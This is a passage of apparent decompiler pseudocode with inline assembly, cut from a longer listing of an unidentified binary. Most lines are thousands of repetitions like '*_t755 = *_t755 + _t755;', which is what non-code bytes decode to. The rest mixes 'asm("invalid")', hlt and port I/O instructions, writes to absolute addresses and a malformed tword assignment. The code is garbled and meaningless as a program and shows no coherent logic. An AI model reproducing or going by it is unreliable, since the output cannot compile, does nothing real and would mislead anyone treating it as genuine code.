								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								_pop(ss);
								_t757 = _t755 + _t1146 + 1;
								 *_t1155 =  *_t1155 + _t757;
								 *_t757 =  *_t757 + _t757;
								 *_t1155 =  *_t1155 + _t757;
								 *_t1155 =  *_t1155 + _t757;
								_t759 = _t757 + _t1146 &  *(_t757 + _t1146);
								 *_t759 =  *_t759 + _t759;
								 *_t759 =  *_t759 + _t759;
								_t761 = _t759 + _t759 + 1;
								_t1147 = _t1146 + _t1146;
								asm("invalid");
								 *_t761 =  *_t761 + 1;
								 *_t761 =  *_t761 + _t761;
								 *((intOrPtr*)(_t761 + 0x24)) =  *((intOrPtr*)(_t761 + 0x24)) + _t761;
								_t762 = _t761 + 1;
								 *((intOrPtr*)(_t762 + _t1212)) =  *((intOrPtr*)(_t762 + _t1212)) + _t1147;
								_t1156 =  &(_t1155[0]);
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *((intOrPtr*)(_t762 + 0x6b4f)) =  *((intOrPtr*)(_t762 + 0x6b4f)) + _t1185;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								 *_t762 =  *_t762 + _t762;
								_t763 = _t762 + _t1185;
								asm("sbb eax, [eax]");
								 *_t763 =  *_t763 + _t763;
								 *_t763 =  *_t763 + _t763;
								asm("hlt");
								 *_t763 =  *_t763 ^ _t763;
								 *_t763 =  *_t763 + _t763;
								 *_t763 =  *_t763 + _t763;
								asm("aam 0x1b");
								_t764 = _t763 + 1;
								 *_t1156 =  *_t1156 + _t764;
								 *_t764 =  *_t764 + _t764;
								_t765 = _t764 + _t1147;
								asm("sbb eax, [eax]");
								 *_t765 =  *_t765 + _t765;
								 *_t765 =  *_t765 + _t765;
								asm("fcomp dword [ebx]");
								_t766 = _t765 + 1;
								 *_t1147 =  *_t1147 + _t766;
								 *_t766 =  *_t766 + _t766;
								_t767 = _t766 + _t1147;
								asm("sbb eax, [eax]");
								 *_t767 =  *_t767 + _t767;
								asm("sbb al, 0x40");
								 *((intOrPtr*)(_t767 + 0x33)) =  *((intOrPtr*)(_t767 + 0x33)) + _t1185;
								_t1157 =  &(_t1156[0]);
								 *_t767 =  *_t767 + _t767;
								 *_t767 =  *_t767 + _t767;
								asm("fisubr word [edi]");
								 *((intOrPtr*)(_t1157 + _t1212)) =  *((intOrPtr*)(_t1157 + _t1212)) + _t1185;
								_t771 = _t767 + _t1157 + 0x33;
								 *_t771 =  *_t771 + _t771;
								ss = 0x54006c00;
								 *((intOrPtr*)(_t771 + _t771)) =  *((intOrPtr*)(_t771 + _t771)) + _t1185;
								 *_t771 =  *_t771 + _t771;
								_t773 = (_t771 & 0x00000031) + 1;
								 *_t1185 =  *_t1185 + _t773;
								 *1 =  *1 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *_t773 =  *_t773 + _t773;
								 *((intOrPtr*)(_t1232 + 0x41)) =  *((intOrPtr*)(_t1232 + 0x41)) + _t1185;
								 *((intOrPtr*)(_t773 + 0x34006eb2)) =  *((intOrPtr*)(_t773 + 0x34006eb2)) + _t773;
								 *_t773 =  *_t773 ^ _t773;
								 *0x3800 =  *0x3800 + _t1157;
								_t777 = _t773 +  *_t773 +  *((intOrPtr*)(_t773 +  *_t773)) + 1 + _t1157;
								 *_t777 =  *_t777 ^ _t777;
								 *_t777 =  *_t777 + _t777;
								_t778 = _t777 +  *_t777;
								 *_t778 =  *_t778 + _t778;
								 *_t778 =  *_t778 + _t778;
								 *_t778 =  *_t778 + _t778;
								 *_t778 =  *_t778 + _t778;
								asm("enter 0x401c, 0x0");
								asm("outsb");
								 *0x000000B3 =  *0x000000B3 ^ 0xb3;
								 *0x000000B3 = 0xb3 +  *0x000000B3;
								_t782 = 0xb3 +  *0x000000B3 + 1;
								 *_t1209 =  *_t1209 + 1;
								 *((intOrPtr*)(_t782 + _t782)) =  *((intOrPtr*)(_t782 + _t782)) + 1;
								 *_t782 =  *_t782 + 0xb2;
								asm("movsb");
								_t783 = _t782 & 0xffff0040;
								asm("invalid");
								 *_t783 =  *_t783 + 0xb2;
								 *_t783 =  *_t783 + 0xb2;
								 *_t783 =  *_t783 + 0xb2;
								 *_t783 =  *_t783 + 0xb2;
								asm("adc al, 0x1d");
								_t784 = _t783 + 1;
								 *((intOrPtr*)(_t784 + 3)) =  *((intOrPtr*)(_t784 + 3)) + _t1185;
								asm("insb");
								_v65472 = _v65472 + _t1185;
								asm("invalid");
								 *_t784 =  *_t784 + 0xb2;
								 *_t784 =  *_t784 + 0xb2;
								asm("fcomp qword [ebx]");
								 *0x00000042 =  *((intOrPtr*)(0x42)) + 1;
								 *((intOrPtr*)(_t1212 - 0x3bffbfea)) =  *((intOrPtr*)(_t1212 - 0x3bffbfea)) + 1;
								_push(ss);
								_push(ss);
								_t787 = _t784 + 3;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *_t787 =  *_t787 + 0xb2;
								 *((intOrPtr*)(_t1232 + 1)) =  *((intOrPtr*)(_t1232 + 1)) + 0xb2;
								 *((intOrPtr*)(0x42)) =  *((intOrPtr*)(0x42)) + 1;
								 *((intOrPtr*)(_t1212 - 0x3bffbfea)) =  *((intOrPtr*)(_t1212 - 0x3bffbfea)) + 1;
								_push(ss);
								_push(ss);
								_t790 = _t787 + 3;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *_t790 =  *_t790 + 0xb2;
								 *((intOrPtr*)(_t1232 + 1)) =  *((intOrPtr*)(_t1232 + 1)) + _t1157;
								 *((intOrPtr*)(0x42)) =  *((intOrPtr*)(0x42)) + 1;
								 *((intOrPtr*)(_t1212 - 0x3bffbfea)) =  *((intOrPtr*)(_t1212 - 0x3bffbfea)) + 1;
								_push(ss);
								_t1188 = _t1185 + _t1157 + _t1157 + _t1157;
								_push(ss);
								_t793 = _t790 + 3;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *_t793 =  *_t793 + 0xb2;
								 *((intOrPtr*)(_t793 + 2)) =  *((intOrPtr*)(_t793 + 2)) + _t1188;
								_push(_t793);
								_t794 = _t793 +  *_t793;
								 *_t794 =  *_t794 + 1;
								 *_t794 =  *_t794 + 0xb2;
								_t795 = _t794 + _t1188;
								 *_t795 =  *_t795 + 0xb2;
								 *_t795 =  *_t795 + 0xb2;
								 *_t795 =  *_t795 + _t795;
								 *_t795 =  *_t795 + _t795;
								 *_t795 =  *_t795 + _t795;
								 *_t795 =  *_t795 + _t1157;
								 *_t795 =  *_t795 + _t795;
								do {
									 *_t795 =  *_t795 + _t795;
									asm("pushad");
									 *_t795 =  *_t795 + _t795;
									_t1188 = _t1188 + _t1157;
									 *_t795 =  *_t795 + _t795;
									 *_t795 =  *_t795 + _t1157;
									 *_t795 =  *_t795 + _t795;
									 *_t795 =  *_t795 + _t795;
									 *_t795 =  *_t795 + _t795;
									asm("adc al, [edx]");
									 *_t795 =  *_t795 + _t795;
									_pop(ds);
									 *_t1212 =  *_t1212 + 1;
									_t795 = _t795 +  *_t795 +  *((intOrPtr*)(_t795 +  *_t795));
									 *_t795 =  *_t795 + _t795;
									 *_t795 =  *_t795 + _t795;
									 *((intOrPtr*)(_t795 - 0x49)) =  *((intOrPtr*)(_t795 - 0x49)) + _t795;
									_push(ds);
									asm("pushad");
									 *(_t1157 - 0x7c6bee30) =  *(_t1157 - 0x7c6bee30) | _t1157;
									 *((intOrPtr*)(_t795 - 0x12efee37)) =  *((intOrPtr*)(_t795 - 0x12efee37)) + _t795;
									asm("loopne 0x1b");
									asm("in eax, dx");
									_pop(_t1212);
									 *(_t1157 - 0x7c6bee30) =  *(_t1157 - 0x7c6bee30) | _t1157;
									_t100 = _t795 - 0x12efee37;
									 *_t100 =  *((intOrPtr*)(_t795 - 0x12efee37)) + _t795;
									asm("pushad");
								} while ( *_t100 < 0);
								_pop(_t1221);
								 *(_t1157 - 0x7c6bee30) =  *(_t1157 - 0x7c6bee30) | _t1157;
								 *((intOrPtr*)(_t795 - 0x12efee37)) =  *((intOrPtr*)(_t795 - 0x12efee37)) + _t795;
								asm("daa");
								asm("loopne 0x18");
								asm("lahf");
								asm("aam 0x99");
								 *(_t1157 - 0x72) = _t1157;
								asm("xlatb");
								asm("outsd");
								_t798 = (_t795 >> _t1157) +  *0x000000A4;
								 *_t798 =  *_t798 + _t798;
								 *_t798 =  *_t798 + _t798;
								 *0x449A3C31 =  *((intOrPtr*)(0x449a3c31)) + _t798;
								 *_t1209 =  *_t1209 - 1;
								 *_t798 =  *_t798 + _t798;
								 *0xFFFFFFFFF81DB2D3 =  *((intOrPtr*)(0xfffffffff81db2d3)) + 0x68;
								asm("rep insd");
								_t1190 = 0x68 -  *0x2A8AFEB7;
								[tword [esp+ecx*4-0x4a] = _t1324;
								_t1150 = 0x60;
								asm("cld");
								 *_t1209 =  *_t1209 + _t1221;
								_t799 =  &_a1;
								_t1223 = _t798;
								 *_t799 =  *_t799 + _t799;
								 *_t799 =  *_t799 + _t799;
								asm("o16 pop ss");
								 *_t799 =  *_t799 + _t799;
								 *_t799 =  *_t799 + _t799;
								 *0x449a3cb1 =  *0x449a3cb1 + 0xd5;
								 *_t799 =  *_t799 + _t799;
								 *0x60 =  *0x60 + _t799;
								 *_t799 =  *_t799 + _t799;
								 *_t799 =  *_t799 + _t799;
								 *_t799 =  *_t799 + _t799;
								 *_t799 =  *_t799 + _t799;
								 *_t1190 =  *_t1190 + _t799;
								 *_t799 =  *_t799 + _t799;
								_t800 = _t799 +  *_t799;
								 *_t1209 =  *_t1209 + _t800;
								 *_t800 =  *_t800 + _t800;
								 *_t800 =  *_t800 + _t800;
								_t801 = _t800 +  *_t800;
								 *0x449a3cb1 =  *0x449a3cb1 + _t801;
								_t802 = _t801 +  *_t801;
								 *_t1209 =  *_t1209 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								_t803 = _t802 +  *_t802;
								 *0x449a3cb1 =  *0x449a3cb1 + _t803;
								_t804 = _t803 +  *_t803;
								 *_t1209 =  *_t1209 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *0x000000D4 =  *0x000000D4 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								 *_t804 =  *_t804 + _t804;
								_t805 = _t804;
								es = es;
								 *_t805 =  *_t805 + _t805;
								 *_t805 =  *_t805 + _t805;
								 *_t805 =  *_t805 + _t805;
								 *_t1190 =  *_t1190 + 0xd5;
								 *_t805 =  *_t805 + _t805;
								 *_t805 =  *_t805 + _t805;
								 *((intOrPtr*)(0xd4 + _t805)) =  *((intOrPtr*)(0xd4 + _t805)) + 0x60;
								 *_t805 =  *_t805 + _t805;
								 *_t805 =  *_t805 + _t805;
								_t806 = _t805 &  *0x000000D4;
								 *_t806 =  *_t806 + _t806;
								asm("invalid");
								asm("cmpsd");
								asm("std");
								asm("invalid");
								asm("cmpsb");
								asm("std");
								asm("invalid");
								asm("movsb");
								asm("std");
								asm("invalid");
								asm("movsd");
								asm("std");
								asm("invalid");
								 *0xa2fffffd = _t806 &  *0x000000D4;
								asm("std");
								asm("invalid");
								_t808 =  *0x64fffffd;
								 *_t808 =  *_t808 + _t808;
								 *_t1223 =  *_t1223 + _t808;
								 *_t808 =  *_t808 + _t808;
								asm("o16 add [eax], al");
								 *_t1209 =  *_t1209 + _t808;
								 *_t808 =  *_t808 + _t808;
								 *_t808 =  *_t808 + _t808;
								 *0x60 =  *0x60 + _t808;
								 *_t808 =  *_t808 + _t808;
								 *0x000000D4 =  *0x000000D4 + 0xd5;
								 *_t808 =  *_t808 + _t808;
								 *_t808 =  *_t808 + _t808;
								 *_t808 =  *_t808 + _t808;
								 *_t1190 =  *_t1190 + 0x60;
								 *_t808 =  *_t808 + _t808;
								 *_t808 =  *_t808 + _t1190;
								_t809 = _t808 |  *_t808;
								 *_t809 =  *_t809 + _t809;
								_t810 = _t809;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 & _t810;
								 *_t810 =  *_t810 + _t810;
								0xb431cba(0x69000000, _t1209, 0xc40bff3e);
								 *_t810 =  *_t810 + _t810;
								 *_t1209 =  *_t1209 + 0x68;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t810 =  *_t810 + _t810;
								 *_t1190 =  *_t1190 + 0x60;
								 *_t810 =  *_t810 + _t810;
								 *((intOrPtr*)(_t810 - 0x7b)) =  *((intOrPtr*)(_t810 - 0x7b)) + 0x60;
								asm("std");
								_t1160 = 0xd4 +  *((intOrPtr*)(_t810 + _t810));
								 *_t810 =  *_t810 + _t810;
								_t1276 =  *_t810;
								_t1234 = _t1232 - 1 + 1;
								asm("popad");
								if(_t1276 == 0) {
									L37:
									 *_t1160 =  *_t1160 + _t810;
									 *_t810 =  *_t810 ^ _t810;
									_push(_t1150);
									_t1160 = _t1160 + 1;
									_push(_t1234 + 1);
									_push(_t1190);
									L38:
									_t1223 =  &_a1;
									_t1209 = _t1209 - 1;
									_t1150 =  &(_t1150[0]);
									_t810 = _t810;
									_t131 =  &_a83;
									 *_t131 = _a83 + _t1160;
									_t1323 =  *_t131;
									L39:
									asm("popad");
									if(_t1323 == 0) {
										L54:
										_t810 = _t810 + 1;
										 *_t1160 =  *_t1160 + _t810;
										 *_t810 =  *_t810 + _t810;
										_a64 = _a64 + _t1190;
										L55:
										_t810 = _t810 + 1;
										 *_t810 =  *_t810 + _t810;
										L56:
										 *_t810 =  *_t810 + _t810;
										 *((intOrPtr*)(_t810 + 0x20)) =  *((intOrPtr*)(_t810 + 0x20)) + _t1190;
										L57:
										_t810 = _t810 + 1;
										 *_t1160 =  *_t1160 + _t810;
										 *_t810 =  *_t810 + _t810;
										 *((intOrPtr*)(_t810 + 0x20)) =  *((intOrPtr*)(_t810 + 0x20)) + _t1150;
										L58:
										_t810 = _t810 + 1;
										 *_t810 =  *_t810 + _t810;
										L59:
										 *_t810 =  *_t810 + _t810;
										L60:
										 *((intOrPtr*)(_t810 + 0x40)) =  *((intOrPtr*)(_t810 + 0x40)) + _t1190;
										L61:
										_t810 = _t810 + 1;
										 *_t1160 =  *_t1160 + _t810;
										 *_t810 =  *_t810 + _t810;
										L62:
										 *((intOrPtr*)(_t810 + 0x20)) =  *((intOrPtr*)(_t810 + 0x20)) + _t1150;
										L63:
										_t811 = _t810 + 1;
										 *_t811 =  *_t811 + _t1160;
										 *((intOrPtr*)(_t1209 + 0x6c006801)) =  *((intOrPtr*)(_t1209 + 0x6c006801)) + _t1190;
										 *((intOrPtr*)(_t811 + 0x54004020)) =  *((intOrPtr*)(_t811 + 0x54004020)) + _t811;
										 *_t811 =  *_t811 + _t811;
										 *_t811 =  *_t811 + _t811;
										_a630456384 = _a630456384 + _t811;
										_t812 = _t811 + 1;
										 *_t812 =  *_t812 + _t812;
										_pop(ds);
										 *((intOrPtr*)(_t812 + _t812)) =  *((intOrPtr*)(_t812 + _t812)) + _t1190;
